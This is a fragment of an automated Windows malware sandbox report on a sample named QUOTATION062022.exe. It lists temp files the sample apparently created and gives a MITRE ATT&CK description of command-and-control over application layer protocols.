C:\Users\user\AppData\Local\Temp\tmp4108.tmp

C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp

C:\Users\user\AppData\Local\Temp\tmp4EA7.tmp

C:\Users\user\AppData\Local\Temp\tmp53EE.tmp

C:\Users\user\AppData\Local\Temp\tmp5452.tmp

C:\Users\user\AppData\Local\Temp\tmp5557.tmp

C:\Users\user\AppData\Local\Temp\tmp605F.tmp

Windows Analysis Report
QUOTATION062022.exe

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre